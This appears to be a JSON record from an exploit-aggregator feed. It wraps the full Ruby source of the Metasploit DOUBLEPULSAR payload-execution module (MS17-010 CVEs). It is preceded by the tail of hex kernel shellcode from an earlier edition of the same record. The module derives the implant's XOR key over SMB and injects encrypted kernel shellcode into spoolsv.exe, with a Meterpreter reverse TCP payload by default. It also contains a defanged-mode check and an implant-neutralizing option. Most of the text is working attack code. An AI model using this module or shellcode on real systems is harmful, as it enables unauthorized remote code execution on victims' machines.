\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:25:08", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f2afc28b3a81c3976677b3793e68ebcc", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-01T00:17:03", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n 